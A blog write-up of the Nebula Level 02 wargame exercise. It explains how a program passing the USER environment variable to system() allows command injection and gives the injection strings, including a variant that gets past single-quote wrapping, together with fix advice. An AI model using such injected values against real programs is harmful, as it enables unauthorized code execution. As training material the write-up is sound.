blog.ferling.eu by Benedikt Ferling


 

exploit-exercises.com/nebula -- Level 02

Problem

  1. Userinput is fully trusted!
  2. Functions are used, that are known to be vulnerable!

As in the previous level, the c-function system(const char *command); is used, which is not save. If userinput is passed directly to the function, the user can execute arbitrary code.

Exploit

You just put the command to execute inside the USER variable. To be more elegant and not triggering some IDS which looks for crashing programs, one might:

  1. First terminate the echo
  2. afterwards execute getflag.
  3. return to the origin
1
2
export USER='; getflag ; /bin/echo'
/home/flag02/flag02

Alternative syntax

Passing the variable USER directly to the process.

1
USER='; getflag ; /bin/echo' /home/flag02/flag02

Lesson / How to fix

  1. Do not trust input that the user controlls!
    How can one handle userinput? The safe use of userinput depends havily on the features of the language one is using!
  2. Do not use functions, that are known to be vulnerable!

In some languages it might be sufficient, to surround the input by single quotes. However not in this case. If you change line 22 like:

1
2
3
...
asprintf(&buffer, "/bin/echo '%s' is cool", getenv("USER"));
...

one might still execute arbitrary code using the following environment-variable USER:

1
USER="' ; ls ; echo '"

This small example should show, that there is no magic formula for sanitizing userinput or protecting the code from userinput!


other levels…

00 01 02 03 04 05 06 07 08 09
10 11 12 13 14 15 16 17 18 19